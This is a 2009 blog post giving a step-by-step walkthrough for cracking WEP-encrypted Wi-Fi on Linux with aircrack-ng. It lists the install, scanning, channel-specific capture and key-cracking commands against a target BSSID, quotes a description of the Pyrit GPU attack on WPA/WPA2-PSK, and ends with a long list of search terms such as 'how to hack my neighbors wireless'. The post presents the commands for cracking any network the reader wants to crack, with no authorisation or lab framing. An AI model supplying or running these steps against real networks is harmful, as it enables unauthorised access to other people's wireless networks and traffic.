Saturday, March 7, 2009

Howto wireless hack linux

Aircrack-ng logo

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted Wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng - on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1


Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”


Search engine terms:


* hack wireless key
* how to hack a wireless network
* wep key hack
* h0
* how to hack a wireless network on xp
* software hack wireless
* hack wi-fi network
* hacking wep with xp
* hack wpa under windows
* how to hack a wep network
* how to bypass blocks on wifi network connections
* Hack WEP key
* how to hack my neighbors locked wireless router
* hack encripted wireless networks
* step pic hack password wireless
* how to hack WAP wifi
* wep crack windows
* hack wep
* hack wireless network
* hacking wireless networks aero
* wireless key hack
* how hack wireless network
* wep crack from windows vista
* how do i hack my neighbors wireless
* WEP hacking home wireless
* wireless wep hack
* wep hacker vista
* step by step crack a wireless network in windows xp
* wireless network hacking tools
* hack wireless
* hack wifi wep password
* hack wep password
* get past a wifi router password
* wep password hack
* wep hacking aircrack-ng
* hack a wireless network password
*
* hack wireless wap
* hack wireless networks from windows
* hack pc wifi
* wireless password hack
* hack wireless security
* vista wep hack tool
* hack network
* netgear network key hack
* hacking wireless networks using software linux aircrack
* how to hack wifi networks
* how to hack wireless networks
* hack wireless network with wep key
* how to hack wep security
* hacking wep
* wlan hack wep
* crack wep in windows vista
* how to hack a wireless network with password
* hack wireless meso linux
* how to hack friends PC through wifi in same network without any software?
* how to hack a wireless
* wi-fi hack
* how to hack wep networks
* windows xp wpa wifi hack
* bypass network password wep
* hack wireless password mac os
* hacking trendnet
* hack wifi viel password
* how to hack into wireless networks
* hacking wireless network
* how to hack into wireless network
* crack wifi free
* how to hack wifi wep
* programs to hack wifi
* how to hack wireless
* wep crack for windows
* hack wep wifi network
* WEP KEY CRACK
* crack wireless network linux
* download program for hacker wireless password
* how to hack a wireless connection
* hack wireless password
* linux wep cracking binary
* wep key hacking tool for VISTA
* network key cracker
* how to hack computer with wireless
* hack wireless networks with vista
* hack into wep key
* download passcode to hack any wireless
* easy hack wep win xp
* hack in to any network wifi
* wireless network hack
* hack wep key
* crack wifi spot
* hacking into wireless networks
* wifi tool wep crack
* how to hack wifi

No comments: